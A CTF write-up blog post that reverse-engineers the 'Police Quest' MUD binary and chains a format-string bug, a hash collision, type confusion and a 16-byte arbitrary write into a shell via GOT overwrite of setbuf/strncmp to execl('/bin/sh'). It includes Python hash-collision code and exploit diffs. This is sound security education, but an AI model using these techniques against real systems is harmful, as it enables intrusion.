Police Quest CTF Exploit Challenge
Introduction
Today, I am going to talk about TheColonial’s “Police Quest” challenge.
It is a challenge that implements a MUD, Multi-User-Dungeon. MUDs were quite a popular genre of games in the 80s. These games were fully textual due to lack of computing power and bandwith at the time. Each gamer would play as a character that would wade through rooms containing objects or characters. It’s the ancestor of the current MMORPG.
This challenge is interesting as it takes the challenger through multiple vulnerabilities in order to properly flag it. It is protected with ASLR/NX/PIE/Partial RELRO.
First we’ll start by reverse engineering the binary, then detailing the different vulnerabilities. We’ll end up exploiting it, porting it for the target docker and making it “universal” for both our targets. There will also be a small part about reliability.
This blog post will be long, I suggest anyone interested to also open their favorite disassembler at the same time. There will be a lot of snippets of code, either disassembly or decompiled output (for readability). Unfortunately, due to the length of this article, there won’t be any gdb outputs and it won’t be necessary for understanding the exploitation process.
Reverse engineering the binary
Here in the reverse engineering section I will switch between ASM view and decompiled C view as it allows to have different analysis angles. It will hopefully improve readability and understanding for the readers. All the shown code has been reversed and symbolicated manually, you’ll have to do it manually if you open the binary.
main
We first start with the main function.
The function does the following:
- Deactivate buffering
- Link rooms between them
- Print a welcome message
- Run a playing turn
- Continue running turns as long as the previous turn was “successful”
- Print message and exit
So our first constraint is to make run_turn() always return something different than 0 or exploitation fails terribly as the challenge exit.
setup
The setup function links up room between them.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
struct room_struct **setup()
{
struct room_struct **result; // rax
hall->north = study;
study->south = hall;
hall->south = library;
library->north = hall;
hall->west = kitchen;
kitchen->east = hall;
library->east = bathroom;
bathroom->west = library;
kitchen->south = bar;
bar->north = kitchen;
result = ¤t_room;
current_room = hall;
return result;
}
When looking what a room is, we end up finding an array of 6 rooms. Each room has an object.
Given the setup() function and the array of rooms in the data section, we get our reversed structure:
We will skip the welcome() function as it only print a banner to the console.
run_turn
The beginning of the function tells you where you are and what are the adjacent rooms.
This part of the code gets your input and then trigger the handlers matching these actions : LOOK, MOVE, USE, GET and INVENTORY.
We got 2 types of commands : those that takes an argument, and those that don’t.
Command LOOK or INVENTORY have the same code, only some offsets change.
This is equivalent to:
1
2
3
if (strcmp ("INVENTORY", user_input) == 0) {
action_inventory ()
}
- This is the main difference between LOOK and INVENTORY.
MOVE, GET and USE have the same code as well but offsets.
You can see the differences between USE, GET and MOVE at 1 (length), 2 (string pointer) and 3 (length again).
This is equivalent to:
1
2
3
if (strncmp ("MOVE ", user_input, 5) == 0) {
action_move (user_input + 5);
}
Then it’s the end of the function.
Any unrecognized inputs will cause the function to exit and make the challenge exit.
Let’s have a look at each action handler.
action_look
This function prints in which room you are and how many objects of the corresponding type is available.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
signed __int64 action_look()
{
printf("You stare vacantly around the %s, pretending to know what you're doing. ", current_room->name);
/* 1 */ if ( current_room->object )
{
if ( current_room->object->count )
/* 2 */ printf("You spy %d %s(s/es).\n", current_room->object->count, current_room->object->desc);
else
/* 3 */ printf("There used to be a %s, but not any more.\n", current_room->object->desc);
}
else
{
puts("There's nothing in view. Go somewhere else if you're bored.");
}
return 1LL;
}
- It check that the room actually has an object associated with it
- There is still N objects of that type
- No more objects, we got all of it
action_inventory
This function just goes through all the inventory and print the description of the items.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
signed __int64 action_inventory()
{
struct inventory_struct *iter_inventory; // [rsp+8h] [rbp-8h]
if ( stuff )
{
iter_inventory = stuff;
printf("You appear to be carrying:");
while ( iter_inventory )
{
printf("\n - A %s", iter_inventory->desc);
iter_inventory = iter_inventory->next;
}
putchar('\n');
}
else
{
puts("You aren't carrying anything. Perhaps you should give up now.");
}
return 1LL;
}
This gives us a hint that there is a structure for keeping tracks of the inventory.
action_move
It checks that it can move to either chosen direction and then set the current_room global variable to the new room, otherwise the program exit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
signed __int64 __fastcall action_move(const char *direction)
{
signed __int64 result; // rax
signed int can_move; // [rsp+1Ch] [rbp-4h]
can_move = 0;
if ( !strcmp("NORTH", direction) && current_room->north )
{
current_room = current_room->north;
can_move = 1;
}
else if ( !strcmp("SOUTH", direction) && current_room->south )
{
current_room = current_room->south;
can_move = 1;
}
else if ( !strcmp("EAST", direction) && current_room->east )
{
current_room = current_room->east;
can_move = 1;
}
else if ( !strcmp("WEST", direction) && current_room->west )
{
current_room = current_room->west;
can_move = 1;
}
if ( can_move )
{
printf("You move %s.\n", direction);
result = 1LL;
}
else
{
puts("Ugh... you can't move that way you muppet!");
result = 0LL;
}
return result;
}
action_use
This select the type of object depending on the obj_desc and then use it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct inventory_struct *__fastcall action_use(char *obj_desc)
{
struct inventory_struct *result; // rax
unsigned int idx_obj; // [rsp+14h] [rbp-Ch]
struct inventory_struct *found_object; // [rsp+18h] [rbp-8h]
for ( idx_obj = 0; ; ++idx_obj )
{
if ( idx_obj > 4 )
{
printf("Use a %s? WAT?!\n", obj_desc);
return 0LL;
}
/* 1 */ if ( !strcmp(all_objects[idx_obj].desc, obj_desc) )
break;
}
/* 2 */ found_object = get_matched_object(all_objects[idx_obj].type, obj_desc, "use");
if ( found_object )
/* 3 */ result = (struct inventory_struct *)((__int64 (__fastcall *)(struct inventory_struct *, char *))all_objects[idx_obj].use_object)(
found_object,
obj_desc);
else
result = 0LL;
return result;
}
- It finds an idx_obj depending on the object we asked for when submitting our command
- It finds our object
- It uses a function pointer contained in the object virtual functions table. That is how objects get specialized. A virtual functions table is an array of functions pointers or a structure containing callbacks corresponding to “actions” for our object.
action_get
This allows us to take an object from a room.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
signed __int64 __fastcall action_get(const char *object_name)
{
unsigned int obj_hash; // [rsp+1Ch] [rbp-124h]
struct bullet_obj *found_object; // [rsp+20h] [rbp-120h]
struct inventory_struct *inventory; // [rsp+28h] [rbp-118h]
char obj_desc[264]; // [rsp+30h] [rbp-110h]
unsigned __int64 stack_cookie; // [rsp+138h] [rbp-8h]
stack_cookie = __readfsqword(0x28u);
if ( !current_room->object )
{
puts("There's nothing in here, you turd popsickle!");
return 0LL;
}
if ( strcmp(current_room->object->desc, object_name) )
{
puts("You're trying to get something that doesn't exist. Well done!");
return 0LL;
}
if ( current_room->object->count )
{
/* 1 */ found_object = (struct bullet_obj *)find_item_by_type(current_room->object->type);
if ( !found_object || found_object->type == OBJECT_BULLET && found_object->is_ready )
{
printf("What secret name shall we give this %s? > ", object_name);
if ( !fgets(obj_desc, 255, stdin) )
{
puts("Fine!");
return 0LL;
}
obj_desc[strlen(obj_desc) - 1] = 0;
if ( strlen(obj_desc) <= 3 )
{
puts("Nope, name long enough.");
return 0LL;
}
/* 2 */ obj_hash = create_hash(current_room->object->type, obj_desc);
if ( find_item_by_hash(obj_hash) )
{
puts("Already got an item with that id!");
return 0LL;
}
inventory = (struct inventory_struct *)((__int64 (__fastcall *)(_QWORD, char *))current_room->object->constructor)(
obj_hash,
obj_desc);
if ( !inventory )
{
puts("Seems like we're all outta mem!");
return 0LL;
}
/* 3 */ inventory->type = current_room->object->type;
inventory->desc = current_room->object->desc;
inventory->hash = obj_hash;
inventory->next = stuff;
if ( stuff )
stuff->prev = inventory;
stuff = inventory;
--current_room->object->count;
printf(
"You sureptitiously acquire a single %s, we've given it the secret hash of 0x%08X.\n",
object_name,
obj_hash);
}
else
{
printf("Sorry, but you've already got a %s.\n", object_name);
}
}
else
{
printf("You've already picked up all of the %s.\n.", object_name);
}
return 1LL;
}
- We can find objects by type
- We can find objects by hash
- This shows that all our objects are linked between themselves and they probably have the same structure at the beginning
Objects
There are 2 structures for objects:
- Kinds
- Items
Kinds
This is what the table of object kinds/headers looks like:
This array of object headers and the reversing of the function create_hash() allow us to get the following structure:
create_hash() function will be detailed later in the vulnerability analysis section.
Items
After some reversing (action_* and create_* functions), we end up with the following items. Each of these items are linked between them to constitute the inventory.
Vulnerability hunting
For the vulnerability hunting phase, since it’s a challenge, we’ll go after the usual common culprits:
- buffer overflow
- format string
- heap overflow off-by-one
- use-after-free
Findings
After reversing a couple of functions, we end up finding 4 vulnerabilities:
- format string
- an easily collisionable hash function
- type confusion
- arbitrary write 16 bytes thanks to the type confusion
Format string
This function is called when we use the MagnifyingGlass object.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
signed __int64 __fastcall use_magnifyingglass(struct magnifying_glass_obj *cur_item)
{
/* ... */
/* 1 */ if ( cur_item->is_clean )
{
/* 2 */ if ( current_room == study )
{
/* ... */
/* 3 */ printf("What kind of object do you want to look at? > ");
if ( fgets(obj_name, 255, stdin) )
{
obj_name[strlen(obj_name) - 1] = 0;
for ( idx_obj = 0; ; ++idx_obj )
{
if ( idx_obj > 4 )
return 0LL;
if ( !strcmp(all_objects[idx_obj].desc, obj_name) )
break;
}
/* 4 */ found_object = get_matched_object(all_objects[idx_obj].type, obj_name, "inspect");
if ( found_object )
{
printf("OK, you asked for the %s detail, here it is:\n", all_objects[idx_obj].desc);
/* 5 */ obj_detail = all_objects[idx_obj].hidden_detail(found_object);
/* 6 */ printf(obj_detail);
/* 7 */ cur_item->is_clean = 0LL;
result = 1LL;
}
else
{
result = 0LL;
}
}
else
{
puts("Fine!");
result = 0LL;
}
}
else
{
printf("Inspecting something while in the %s? Noob.\n", current_room->name);
result = 0LL;
}
}
else
{
puts("You can't use a magnifying glass that is filthy dirty! Fool.");
result = 0LL;
}
return result;
}
- The MagnifyingGlass needs to be cleaned before using it. We need to use a Tissue before using it. As long as is_clean is different than 0, then the MagnifyingGlass is considered clean.
- We need to be in the study room
- We choose the object we want to look at, that’s it’s detail that’s going to be used for the format string
- It looks for the object we requested
- The object hidden detail is returned but we don’t control it (yet)
- The detail is used directly! It’s a format string. We need to find a way of controlling that input.
- is_clean is resetted to 0 so the format string can’t be used anymore (there is only 1 tissue by default)
Hash collision
The create_hash() function is collisionable ;). A hash collision is when 2 sequences of bytes hash to the same value.
Here is the reconstructed code in Python.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
class Pwner (object):
def __init__ (self):
self.obj_magic = {
'Revolver' : 0xFFD1CC90,
'Bullet' : 0xA060E1B3,
'Tissue' : 0x0A17B609,
'MagnifyingGlass' : 0x55754F83,
'Target' : 0x7D90DD54,
}
def create_hash (self, obj_desc, obj_name):
if obj_desc not in self.obj_magic:
raise ValueError ("Object Description doesn't exist")
initial_hash = self.obj_magic[obj_desc]
hashed = initial_hash # 1
for idx_name in range (len (obj_name)):
byte = get_byte (initial_hash, idx_name % 4)
hashed = 16 * hashed # 2
hashed = hashed ^ ord (obj_name[idx_name]) ^ byte # 3
hashed = hashed & 0xffffffff
return hashed
- It initialise the hash with a default hash value corresponding to the selected object
- It shifts the hash 4 bits on the left at each iteration : the last 4 bits are always first set to 0 at each iteration.
- It xors 3 values : the hash, a byte of the string to hash and a byte of the initial object hash
So there is some maths to do but it’s doable.
Remember the XOR table.
A | B | A^B |
---|---|---|
0 | 0 | 0 |
0 | 1 | 1 |
1 | 0 | 1 |
1 | 1 | 0 |
In order to do the collision, the idea is to collide/”write” the hash 4 bits at a time. First, we always like to start from a known point of reference. I would thus like to initialize our hash to 0. Once it’s 0, we can write/collide our hash 4 bits at a time.
Set the hash to 0
We know that our hash is shifted by 4 bits at each iteration so we can use that characteristic to set our hash to zero. If we shift any 32 bits value 4 bits at a time and repeat this procedure 8 times, it becomes 0 due to how SHL operation works on processors ;).
We first need to zero out this term:
1
ord (obj_name[idx_name]) ^ byte
To do that, if our string byte is the same, then it’s nulled.
Let’s say our initial_hash = 0xFFD1CC90 and our object name is 0xFFD1CC90FFD1CC90.
We set our last byte to 0, we continue this process and we’ll get our hash to 0.
Collision
Ok now we got our hash to 0, we now want to collide the hash 4 bits at a time.
Let’s say we want to collide a “Revolver” with name “MyGun” to a “Target” kind.
We want the following:
1
2
create_hash ('Revolver', 'MyGun') = 0xC9D6CE5E
create_hash ('Target', name_collider) = 0xC9D6CE5E
We look up our object initial hashes table to get our initial hash for Target:
1
2
3
4
5
6
7
8
9
class Pwner (object):
def __init__ (self):
self.obj_magic = {
'Revolver' : 0xFFD1CC90,
'Bullet' : 0xA060E1B3,
'Tissue' : 0x0A17B609,
'MagnifyingGlass' : 0x55754F83,
'Target' : 0x7D90DD54,
}
We want to collide 0xC (start of 0xC9D6CE5E):
If we repeat this procedure, we end up colliding any hash we want.
We thus get the values 0x71, 0x99, 0xD0 and 0x52 for writing the 2 first bytes.
Continuing this procedure allows us to collide any hash.
Hash Collision Code
This is ugly code, this can be cleaned, but it does the job given the math explained above. Each iteration generates 2 bytes to generate 1 collided byte. It returns the binary data necessary for obtaining the wanted hash.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
def collide_hash (self, obj_desc, to_collide):
if obj_desc not in self.obj_magic:
raise ValueError ("Object Description doesn't exist")
initial_hash = self.obj_magic[obj_desc]
# allows to set the hash to 0
data = struct.pack ('<I', initial_hash) * 2
#print 'initial_hash : 0x%x' % initial_hash
value = to_collide
hashed = initial_hash
idx_hash = 0
to_append = ''
for idx in range (4, -1, -1):
quartet0 = get_byte (initial_hash, idx_hash % 4) & 0xf0
quartet1 = get_byte (initial_hash, idx_hash % 4) & 0xf
idx_hash += 1
quartet2 = get_byte (initial_hash, idx_hash % 4) & 0xf0
quartet3 = get_byte (initial_hash, idx_hash % 4) & 0xf
idx_hash += 1
q0 = (get_byte (to_collide, idx % 4) & 0xf0) >> 4
q1 = get_byte (to_collide, idx % 4) & 0xf
# compute quartets to write
byte0 = quartet0 | (q0 ^ quartet1)
byte1 = quartet2 | (q1 ^ quartet3)
to_append += chr (byte0)
to_append += chr (byte1)
data += to_append
'''
print "Let's check collision!"
hashed = create_hash (obj_desc, data)
if hashed == to_collide:
print 'Successfully collided hash : 0x%x' % to_collide
else:
print 'tocollide : 0x%x hashed : 0x%x' % (to_collide, hashed)
'''
return data
Type Confusion
The idea of a type confusion is to manipulate an object as another object. Through the alignment of fields of some objects, we can get interesting effects as it will be showed later on. Type confusion is due to improper casting, hash collision, use-after-free, etc. It allows to get read memory/write memory/execute code primitives.
In the function action_get(), we saw that it was possible to search objects by type or by hash. We can’t control the type but we can control the hash and we know how to collide hashes. So we can eventually make find_item_by_hash() return any object in the inventory we want and use it as another type of object. Spoiler : There is no type confusion in action_get().
Looking where the function find_item_by_hash() is used, there is a call in the function get_matched_object(). The function get_matched_object() is used in use_magnifyingglass() and in use_revolver().
get_matched_object() function
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct inventory_struct *__fastcall get_matched_object(unsigned int idx_obj, char *obj_desc, char *action_desc)
{
/* ... */
printf("What's the ID of the %s you want to %s? > ", obj_desc, action_desc);
/* 1 */ if ( fgets(buffer, 255, stdin) )
{
buffer[strlen(buffer) - 1] = 0;
/* 2 */ if ( strlen(buffer) == 10 && buffer[0] == '0' && buffer[1] == 'x' )
{
/* 3 */ obj_hash = hex_string_to_int(&buffer[2]);
if ( obj_hash )
{
printf("What's the secret of the %s that matches the ID? > ", obj_desc);
/* 4 */ if ( fgets(obj_name, 255, stdin) )
{
obj_name[strlen(obj_name) - 1] = 0;
if ( strlen(obj_name) > 3 )
{
/* 5 */ if ( create_hash(idx_obj, obj_name) == obj_hash )
{
/* 6 */ found_object = find_item_by_hash(obj_hash);
if ( found_object )
{
result = found_object;
}
- We submit the hash we want to collide with, this will correspond to the hash of the returned object
- A hash string needs to start with ‘0x’
- This gets converted to an integer and it needs to be different from 0
- That’s the “name” of our object but we’ll input our string that allow us to collide the hash to get our wanted object
- Using our object kind (idx_obj) initial hash and our crafted string, we get to collide and pass that check
- This finds the object of our choice
So we can basically return any object we want as long as it’s in the inventory. We could return a Bullet while we were expecting a Target.
Exploitation
When reversing the binary, we find the following:
- hash collision in order to trigger type confusion
- we can use the arbitrary write16 only 3 times
- we can use the format string only once
Format string
The format string original data comes from a object->detail buffer, but it is not modified or controlled. Thanks to the type confusion, we exploit it to confuse types between a revolver and a target.
Let’s go back to use_magnifyingglass() code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
signed __int64 __fastcall use_magnifyingglass(struct magnifying_glass_obj *cur_item)
{
/* ... */
/* 1 */ if ( cur_item->is_clean )
{
/* 2 */ if ( current_room == study )
{
/* ... */
printf("What kind of object do you want to look at? > ");
/* 3 */ if ( fgets(obj_name, 255, stdin) )
{
obj_name[strlen(obj_name) - 1] = 0;
for ( idx_obj = 0; ; ++idx_obj )
{
if ( idx_obj > 4 )
return 0LL;
/* 4 */ if ( !strcmp(all_objects[idx_obj].desc, obj_name) )
break;
}
/* 5 */ found_object = get_matched_object(all_objects[idx_obj].type, obj_name, "inspect");
if ( found_object )
{
printf("OK, you asked for the %s detail, here it is:\n", all_objects[idx_obj].desc);
/* 6 */ obj_detail = all_objects[idx_obj].hidden_detail(found_object);
/* 7 */ printf(obj_detail);
/* 8 */ cur_item->is_clean = 0LL;
result = 1LL;
}
- The MagnifyingGlass needs to be cleaned before using it. We need to use a Tissue before using it. As long as is_clean is different than 0, then the MagnifyingGlass is considered clean.
- We need to be in the study room
- We choose the object we want to look at, that’s it’s detail that’s going to be used for the format string
- Once we found our object kind, it leaves the loop
- It looks for the object we requested
- It gets the pointers to the detail buffer, which is at an offset of the heap allocated object
- It uses that buffer directly, that’s our format string vulnerability (no FORTIFY_SOURCE here)
- cur_iteam->is_clean is set to 0 again, so we can’t use our format string anymore (only 1 object of kind “Tissue” by default
Here we’ll do a type confusion between a Target and a Revolver. We control the serial of the revolver so it allows us to have a small format string of 8 bytes. We can extend the format string by corrupting the revolver detail buffer.
When looking at the following structures:
We can see that if we exploit a type confusion between a target and a revolver, target_obj.detail is aligned to revolver_obj.serial_number (which we control).
A very important detail about the format string is that the object is allocated in the heap. It means the format string buffer is also in the heap. When exploiting a classic format string using the techniques in the TESO paper, the format string is written to the stack and we end up finding it after multiple “%x” popping the stack. In this challenge, we need to find where the format string direct parameters are located and then inject our addresses accordingly. This will be explained later in this article.
Arbitrary write 16
The write address originally comes from Target->targetname, but it is not modified or controlled. We do a type confusion between a bullet and a target in order to get control.
The use_revolver() code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
signed __int64 __fastcall use_revolver(struct revolver_obj *revolver_item)
{
/* ... */
/* 1 */ if ( revolver_item->bullet )
{
/* 2 */ if ( current_room == hall )
{
printf("What kind of object do you want to shoot at? > ");
/* 3 */ if ( fgets(obj_desc, 255, stdin) )
{
obj_desc[strlen(obj_desc) - 1] = 0;
/* 4 */ if ( !strcmp(obj_desc, all_objects[OBJECT_TARGET].desc) )
{
/* 5 */ found_target = (struct target_obj *)get_matched_object(all_objects[OBJECT_TARGET].type, obj_desc, "shoot");
if ( found_target )
{
bullet_mark = (int *)revolver_item->bullet->mark;
/* 6 */ target_buf = found_target->target_name;
bullet_byte1 = (int *)*((_QWORD *)bullet_mark + 1);
/* 6 */ *(_QWORD *)target_buf = *(_QWORD *)bullet_mark;
/* 6 */ *((_QWORD *)target_buf + 1) = bullet_byte1;
/* ... */
remove_instance((struct inventory_struct *)revolver_item->bullet);
revolver_item->bullet = 0LL;
result = 1LL;
}
- We need to use a bullet in order to have a loaded revolver
- We need to be in the hall
- We choose the object to shoot at, it can only be “Target”
- It actually checks we chose an object of kind “Target” to shoot at
- We’ll do a type confusion between a Target and a Bullet. We control the bullet serial and it gets used as an address
- We can write 16 bytes to anywhere we want
As shown, we control the serial number of a bullet and the mark buffer. The serial number will be used as an address and 16 bytes of the mark buffer will be copied at the given address.
When looking at the following structures:
We can see that if we exploit a type confusion between a target and a bullet, target_obj.target_name is aligned to bullet_obj.serial_number (which we control).
Ideas
- We need to be able to use the format string and arbitrary write16 as much as we want (infinite objects of kind “Tissue” and “Bullet”)
- In order to be able to do this, we need to be able to modify the all_objects table to set our tissues and bullets quantity to 0xffffffff
- So we need an address in the stack, and address in the heap and one in the binary
- For the payload, since I am lazy, I’m not doing any ROP and I can’t use shellcode because of NX.
Steps 1 and 2 are pretty easy once the necessary addresses are leaked in step 3. Step 4 is a little more interesting as it needed some more reversing.
Once we can exploit the format string and arbitrary write16 as much as we want, we’ll build a leaking primitive to leak anything. This will allow us to bypass ASLR/PIE.
Leaking primitive
Our leak primitive is based on the format string vulnerability. The idea is to do the following:
1
printf("%750$s", arg1, ..., arg750);
Our payload
So, in order to avoid ROP, I will use the old ret2libc technique but with some “weird” gadgets. ROP is cool but it is not the most reliable technique as it needs tons of gadgets addresses, it’s painful to build, it can take room, etc.
In order to spawn our shell, I wanted to have this:
1
2
3
execl("/bin/sh", NULL);
// rdi = &"/bin/sh"
// rsi = NULL
While reversing, I found this beautiful gadget 0 in the main() function:
We patch the _setbuf() entry with execl(), luckily _setbuf() is not called anywhere else so it’s perfect.
Now I needed a gadget to set rax to point to “/bin/sh”.
I ended up finding this gadget 1 in run_turn():
Yeepee! rax is set to user_input, which we control entirely thanks to the fgets preceding it.
- Patch setbuf() got entry with execl() function address
- Patch strncmp() got entry with the gadget 0 address (setbuf call location)
- Send “/bin/sh” to get our shell
When we send “/bin/sh”, this gets passed to strncmp() (which is now pointing to our setbuf gadget). Then our execl() gets called and we get our shell :).
Primitives
Yet again about these “famous” primitives. When you read modern exploitation papers, “everyone” talks about primitives all the time. The most common primitives are : read memory, write memory and execute arbitrary code.
As soon as you get the read memory and write memory primitives, you generally can get the execute arbitrary code. This allows the exploit writer to leak anything and corrupt program state even further as he sees fit in order to get arbitrary code execution. I won’t get into the details as there are many many many techniques.
Using vulnerabilities you thus strive to build primitives. We could imagine other primitives:
- build a brainfuck interpreter : https://nebelwelt.net/publications/files/16BalCCon-presentation.pdf
- read/write files
- random pool exhaustion
- is_valid_address() (allows to break ASLR among other things) : https://hackaday.com/2017/02/15/aslrcache-attack-defeats-address-space-layout-randomization/
- arbitrary file upload
- etc
Exploitation summary
So, I came up with the following exploitation steps:
- Get all objects. Make sure to include the 8 bytes “%lx.%lx.” format string as the Revolver serial.
- Use the type confusion in the function use_magnifyingglass() so the Revolver is used as a target and thus the serial is used as a format string, this allows us to leak a stack address and a heap address.
- Use bullet 1 to re-activate the format string
- Use bullet 2 to extend the revolver format string
- Exploit the format string again to leak more values, we get the all_objects address, we got an address in the binary
- Use bullet 3 to have infinite bullets, so we now have infinite write16
- Get infinite tissues, so we now have infinite format strings
- Leak execl() address
- Patch setbuf() got entry to execl()
- Patch strncmp() got entry to jump to setbuf call
- Trigger the strncmp() call so the shell is spawn
- Get the shell, get the flag
Porting the exploit
In order to port the exploit, only 1 offset needs to be changed : the format string direct parameters location.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
--- poc_obj_ubuntu.py 2018-12-27 04:19:38.963278180 +0100
+++ poc_obj_docker.py 2018-12-27 04:19:24.231781128 +0100
@@ -40,7 +40,7 @@
self.addr_objects = 0
self.addr_stack = 0
# target
- self.target = process ('./police_quest')
+ self.target = remote ('127.0.0.1', 10100)
def create_hash (self, obj_desc, obj_name):
if obj_desc not in self.obj_magic:
@@ -353,7 +353,7 @@
leaked = leaked.split ('.')
self.addr_stack = hex_to_addr (leaked[0])
- self.addr_fmt_args = self.addr_stack + 0x25e8
+ self.addr_fmt_args = self.addr_stack + 0x2638
self.addr_heap = hex_to_addr (leaked[1])
print 'addr_stack : 0x%x' % self.addr_stack
Targetless
To get the targetless part, I used a simple primitive to find our 750th format string direct parameter argument. 750th was chosen because it was far enough in the stack as it didn’t seem used that much and it was not at the end of the stack.
The idea is to write and leak. As long as I don’t leak the written value with the format string “%750$lx”, I continue hunting until:
- the challenge crash, exploit failed
- the defined maximum stack address is reached, exploit failed
- the value gets leaked, the address is found, exploitation continues
There are some hardcoded offsets dependant on the challenge binary. This can be fixed but exploitation would be way slower. The idea being to leak the binary using the format string and then parse it to dynamically find offsets.
Exploit Output
Reliability
The golden rule in exploitation is reliability. The more reliable your exploit is, the less crashes it will cause and it will thus be less suspicious.
Concerning this challenge, while testing and relaunching the exploit multiple times, I got a reliability of around 65-70% after around 1000-2000 runs. This can be improved but it should be good enough for a challenge.
To improve reliability, there are still many possibilities for the motivated readers to explore:
- statistics on where the format string parameters most commonly land, this will avoid crashes due to junked pointers or important values
- use the format string to inject the address to leak, the address of the parameter to inject must not have bad chars
- there is the possibility to inject the bad char 0xa and write a primitive to inject any value in this challenge
- Possibly other techniques but this wasn’t researched
For the 3rd idea, I haven’t tried but if we look closely at the write16 code for instance:
1
2
3
4
5
6
7
8
printf("Bullets leave a mark. What mark should this one leave? > ", 255LL);
/* 1 */ if ( !fgets(cur_bullet->mark, 18, stdin) )
{
puts("Fine!");
return 0LL;
}
cur_mark = cur_bullet->mark;
/* 2 */ cur_mark[strlen(cur_bullet->mark) - 1] = 0;
- fgets() only stops reading if there is an EOF or a newline. It means it accepts “\x00” as valid input
- This zero out only the byte before the first “\x00”
So imagine this buffer:
Ok expected result.
Now, another example:
Whoops, the “\n” is still there. This subtle bug will allow us to insert “\n” at will. The trick to write a value containing “\n” is in multiple writes so care must be taken not to junk critical data.
For the motivated readers who explore some of these paths, they’ll see that the amount of work to get more reliability is exponential. Reliability is the result of an exponential amount of time needed. The last percents of reliability will need more work and way more code.
More research ideas
Once you got your shell in TheColonial’s challenge, you’ll end up in a chrooted environment with 3 binaries : sh, ls and cat. Unfortunately, there are no suid binaries or proper permissions to escape the chroot jail. In order to escape, you’ll need to get root through a kernel exploit. IF you got one appropriate for the host, you may as well escape the docker jail.
Conclusion
This challenge was interesting in multiple ways as a deep understanding of the binary is necessary and mostly, multiple vulnerabilities needed to be exploited. Finally, the main “modern” protections have been enabled and these were all bypassed. Concerning the payload, it was not shellcode, it was not ROP, ret2libc did the job thanks to manually found gadgets.
Th goal of this post was to show some of the exploitation process I go through when I have a vulnerability and I need to get a shell. Hopefully, it was helpful and interesting, don’t hesitate to contact me just for constructive suggestions/chatting.
With the proper vulnerabilities and proper primitives, you can always get a shell. Here we ended up building an arbitrary read and arbitrary write which allows us to further corrupt program state in order to spawn a shell.
m_101